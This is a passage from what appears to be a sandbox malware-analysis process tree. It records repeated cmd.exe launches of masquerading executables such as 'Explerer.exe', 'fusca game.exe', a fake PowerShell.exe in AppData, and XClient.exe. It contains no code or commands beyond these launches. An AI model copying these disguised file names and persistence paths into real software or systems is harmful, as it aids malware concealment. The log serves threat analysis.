  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:1884
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5956
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:1596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8988
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8984
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8344
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7244
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5868
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8364
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8420

C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\AppData\Roaming\PowerShell.exe
1⤵
PID:6660

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:7720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7816
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7316
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6212

C:\ProgramData\Desktop Window Manager.exe
"C:\ProgramData\Desktop Window Manager.exe"
1⤵
PID:8620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:9076
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7188
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8812
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:9164
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7444
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6216
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3800
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8716
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8536
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7228
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6264
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6704
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3724
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5680
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6788
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8776
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8664
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8640
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8332
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7368
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7152
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:1864
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8736
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:9048
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5052
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6572
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8984
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8944
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7432
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8696
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8024
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7064
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8684
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:2416
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:456
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7036
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7204
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6848
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5408
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7424
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:9040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:9112
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8716
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8768
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:508
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5460
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8828
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2248
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2420
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8300
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5372
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8216
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8316
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7928
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8072
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6720
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8776
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8160
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8976
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8584
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8060
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7768
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5580
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8968
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8788
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7784
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7076
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:2344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3228
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8944
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:9208
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:9164
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:9084
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8536
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7064
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7736
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8948
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6452
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5288
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5920
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:2132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8588
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:2868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7948
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7756
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6344
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3240
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8992
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:2248
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5428
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7496
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7200
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8752
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6956
- C:\Users\Admin\AppData\Roaming\Explerer.exe
